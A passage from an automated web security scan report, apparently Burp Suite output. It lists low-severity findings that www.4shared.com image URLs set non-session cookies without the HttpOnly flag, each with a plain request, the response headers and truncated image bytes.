The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e66_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:24 GMT; Path=/
Set-Cookie: hostid=92561674; Expires=Mon, 26-Jul-2021 14:00:24 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:24 GMT
ETag: W/"3729-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 3729
Date: Fri, 29 Jul 2011 14:00:23 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...3IDATx..\{lT.....3.......xl..@...M1u.H@..H.....ZUQ...n.J}H+.....VUw..T..Rmv.d..m7...$.(. @.<.)Ocp...y.}..s.....H.u......;w...w
...[SNIP]...

6.125. http://www.4shared.com/images/mobile/nokia_e71_thumb.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/nokia_e71_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e71_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=794225068; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"4399-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 4399
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[il\.u..{........HI.(..)..hG    ....6uQ...&H..).....1Z.I.8.....6h.8.a$.....[.....E....I......r..M.9.TI.RlT)f.>a.7......9..
...[SNIP]...

6.126. http://www.4shared.com/images/mobile/nokia_e72_thumb.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/nokia_e72_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e72_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=-1497623547; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"4543-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 4543
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...aIDATx..\ytT.u..eV....:...;.r....    N...q|../..mJ....M\..M..&iOR7i{.....M...r.lL...`.!..H..vi4...y..~......s....;3...7.~........
...[SNIP]...

6.127. http://www.4shared.com/images/mobile/screens/4mS_1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/screens/4mS_1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=1643169800; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"9084-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 9084
Date: Fri, 29 Jul 2011 14:00:19 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
........R..#z...............    ...    .......

.

.......................................................................................
...[SNIP]...

6.128. http://www.4shared.com/images/mobile/screens/4mS_2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/screens/4mS_2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=870060581; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"12561-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 12561
Date: Fri, 29 Jul 2011 14:00:19 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
......."...1................    ...    .......

.

.......................................................................................
...[SNIP]...

6.129. http://www.4shared.com/images/mobile/screens/4mS_3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/screens/4mS_3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=-480347017; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"11939-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 11939
Date: Fri, 29 Jul 2011 14:00:19 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
E...^.. ....................    ...    .......

.

.......................................................................................
...[SNIP]...

6.130. http://www.4shared.com/images/mobile/screens/4mS_4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/screens/4mS_4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:21 GMT; Path=/
Set-Cookie: hostid=739213679; Expires=Mon, 26-Jul-2021 14:00:21 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:21 GMT
ETag: W/"11916-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 11916
Date: Fri, 29 Jul 2011 14:00:20 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
G...... ....................    ...    .......

.

.......................................................................................
...[SNIP]...

6.131. http://www.4shared.com/images/mobile/square_4shared.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/square_4shared.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/square_4shared.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=269975739; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"5202-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: image/png
Content-Length: 5202
Date: Fri, 29 Jul 2011 14:00:19 GMT

.PNG
.
...IHDR...P...J......>D.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..\    .T..~....z.WW..t...=......\"z..Y...O..!fN...qr.I.9..M.h..`....YF..........i..............P...}...b.{....{...{..q.....
...[SNIP]...

6.132. http://www.4shared.com/images/mobile/symbian_mobile_new.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/symbian_mobile_new.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/symbian_mobile_new.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:45 GMT; Path=/
Set-Cookie: hostid=-852109778; Expires=Mon, 26-Jul-2021 13:59:45 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:45 GMT
ETag: W/"82006-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/png
Content-Length: 82006
Date: Fri, 29 Jul 2011 13:59:44 GMT

.PNG
.
...IHDR.............._......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx.....dWy'...*..;...n..V@ .J.    ,...&,,.....l..m.c{..=?.^.a.....f,c0x1A.$..ZY...._..o8.}.9.....^?    ...Q.JU....|...#..>.....p.
...[SNIP]...

6.133. http://www.4shared.com/images/musImg2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/musImg2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musImg2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=640133808; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"918-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 918
Date: Fri, 29 Jul 2011 14:07:54 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

6.134. http://www.4shared.com/images/musImg3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/musImg3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musImg3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:01 GMT; Path=/
Set-Cookie: hostid=651183055; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:01 GMT
ETag: W/"2780-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 2780
Date: Fri, 29 Jul 2011 14:08:01 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

6.135. http://www.4shared.com/images/musImg4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/musImg4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musImg4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=-1822653113; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"18774-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 18774
Date: Fri, 29 Jul 2011 14:07:54 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

6.136. http://www.4shared.com/images/musScr2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/musScr2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/musScr2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:58 GMT; Path=/
Set-Cookie: hostid=1218369530; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:58 GMT
ETag: W/"12835-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 12835
Date: Fri, 29 Jul 2011 14:07:58 GMT

GIF89a.........rsu...0-/pv.....x...............................ROq...XX[kn.k..u....p..b...`o....g.OXe............R_p....53ALX...................EDH...FD].....z...................|.......><P=Ht-I....`
...[SNIP]...

6.137. http://www.4shared.com/images/play.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/play.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/play.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:10:52 GMT; Path=/
Set-Cookie: hostid=937360389; Expires=Mon, 26-Jul-2021 14:10:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:10:52 GMT
ETag: W/"940-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 940
Date: Fri, 29 Jul 2011 14:10:51 GMT

GIF89a...................................................................ccb.............................................vvu.........^]\.........h.V...}}}...,.%....................................?./.
...[SNIP]...

6.138. http://www.4shared.com/images/resellerHead.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/resellerHead.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/resellerHead.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:02 GMT; Path=/
Set-Cookie: hostid=-212655209; Expires=Mon, 26-Jul-2021 14:03:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:02 GMT
ETag: W/"148632-1296125992000"
Last-Modified: Thu, 27 Jan 2011 10:59:52 GMT
Content-Type: image/png
Content-Length: 148632
Date: Fri, 29 Jul 2011 14:03:02 GMT

.PNG
.
...IHDR...F...^......R......tEXtSoftware.Adobe ImageReadyq.e<..D:IDATx...    .%.Y..E.......Y.YY..]U...[.-...l.: $...6..X.3..<..`3g...9x...I.h.....[.o..Y.../o_"..n.....>x......*_...F........y..z
...[SNIP]...

6.139. http://www.4shared.com/images/shad1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/shad1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:55 GMT; Path=/
Set-Cookie: hostid=1519705480; Expires=Mon, 26-Jul-2021 14:09:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:55 GMT
ETag: W/"51-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:09:55 GMT

GIF89a...................!.......,.............0..;

6.140. http://www.4shared.com/images/shad2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/shad2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:51 GMT; Path=/
Set-Cookie: hostid=-1279688964; Expires=Mon, 26-Jul-2021 14:09:51 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:51 GMT
ETag: W/"51-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 51
Date: Fri, 29 Jul 2011 14:09:51 GMT

GIF89a...................!.......,............"3..;

6.141. http://www.4shared.com/images/shad3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/shad3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:53 GMT; Path=/
Set-Cookie: hostid=1167444018; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:53 GMT
ETag: W/"63-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 63
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a.......\a{fm.bh.V[sel..........!.......,...........H$0..;

6.142. http://www.4shared.com/images/shad4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/shad4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shad4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:53 GMT; Path=/
Set-Cookie: hostid=212934130; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:53 GMT
ETag: W/"63-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 63
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a.......\a{fm.bh.V[sel..........!.......,.............B..;

6.143. http://www.4shared.com/images/top.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/top.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/top.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=722792242; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"9445-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/jpeg
Content-Length: 9445
Date: Fri, 29 Jul 2011 14:07:53 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................D....
...[SNIP]...

6.144. http://www.4shared.com/images/topbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/topbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

